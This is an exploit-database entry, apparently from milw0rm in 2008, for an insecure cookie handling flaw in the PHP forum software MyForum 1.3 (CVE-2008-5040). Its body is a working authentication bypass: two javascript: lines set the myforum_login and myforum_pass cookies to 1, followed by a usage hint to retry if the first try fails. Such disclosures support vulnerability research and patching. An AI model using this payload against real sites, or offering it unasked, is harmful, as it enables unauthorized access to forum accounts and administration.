MyForum 1.3 - Insecure Cookie Handling
Author: Stack
type: webapps
platform: php
port:
date_added: 2008-10-27
date_updated:
verified: 1
codes: OSVDB-49864;CVE-2008-5040
tags:
aliases:
screenshot_url:
application_url:
###############################################################################################
[+] MyForum 1.3 Insecure Cookie Handling Vulnerability
[+] Discovered By : Mountassif Moad
[+] Greetz : All my freind
################################################################################################
Exploit:
javascript:document.cookie = "myforum_login=1; path=/";
javascript:document.cookie = "myforum_pass=1; path=/";
desc: if it dont work in the first test try another test
# milw0rm.com [2008-10-28]